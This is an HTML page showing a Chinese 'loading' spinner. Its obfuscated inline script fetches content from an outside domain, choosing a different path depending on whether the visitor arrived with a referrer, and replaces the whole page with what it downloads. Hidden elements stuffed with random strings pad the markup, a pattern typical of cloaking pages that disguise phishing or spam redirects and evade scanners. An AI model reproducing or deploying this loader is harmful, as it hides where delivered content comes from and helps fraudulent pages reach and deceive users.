<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .fwCFjA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .fwCFjA .jcqyv5u {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .fwCFjA .content {
            line-height: 50px;
            text-align: center
        }

        .fwCFjA .img {
            width: 100%
        }

        .fwCFjA .FhHpzjC5Ix {
            text-align: center
        }

        .fwCFjA .FhHpzjC5Ix span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .fwCFjA .FhHpzjC5Ix span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .fwCFjA .FhHpzjC5Ix span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .fwCFjA .FhHpzjC5Ix span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .fwCFjA .FhHpzjC5Ix span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .fwCFjA .FhHpzjC5Ix span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .fwCFjA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XZUUPzQgU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var K3YPF = XZUUPzQgU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ K3YPF +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ K3YPF +".html?a=share";
		}
		
        vkzgsIvL8=url+"#"+new Date().getTime();
        vkzgsIvL8 && function() {
            $.get(vkzgsIvL8, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>UfeDQbA4rAxLwpHxnJLCJyzVIb806qlkm3IKbqrQrVyRrShSKVHrT9tSzf7NsAZRSDOJ0V</a>
<span style='display:none'>gfkrnQWgvrGmwyIcC8MROyvY</span>
<ul style='display:none' >o686y3vYklPu</ul><div class="fwCFjA">
    <div class="jcqyv5u">
        <div class="FhHpzjC5Ix">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>s0HQQJpUcfP3JnKmOSuXXGgAT7epdDwKrzkCCDlwPh5KTbiwy9QauNM2ATeRIfsCcnsuu0ffs4HobiVNiWAkooMb6ba</p>
<ul style='display:none' >Bbi6KWGrOOV6ZqcPdm9WcOSwvmlEHtfbhF0MzPbs9Jac1NLohepPjkOiA9</ul>
<a  href='#' style='display:none'>kxWMiC3SixgoW6wVmg8oVWZb6wCXu3NZs7I2OvG34iyKnc9WMHPEO1yWs9Hv4UNR</a>
<ul style='display:none' >Bbi6KWGrOOV6ZqcPdm9WcOSwvmlEHtfbhF0MzPbs9Jac1NLohepPjkOiA9</ul>
<div style='display:none'>N9h2zui33S1tNcW2TtrBdPvH3sdhh8FGMRX1pR0UEdJdIGHpQgebRXfDOukBvqXJw09jIlfHhA7Z4NZaMXAi</div>
<p  style='display:none'>s0HQQJpUcfP3JnKmOSuXXGgAT7epdDwKrzkCCDlwPh5KTbiwy9QauNM2ATeRIfsCcnsuu0ffs4HobiVNiWAkooMb6ba</p>
<a  href='#' style='display:none'>kxWMiC3SixgoW6wVmg8oVWZb6wCXu3NZs7I2OvG34iyKnc9WMHPEO1yWs9Hv4UNR</a></body>
</html>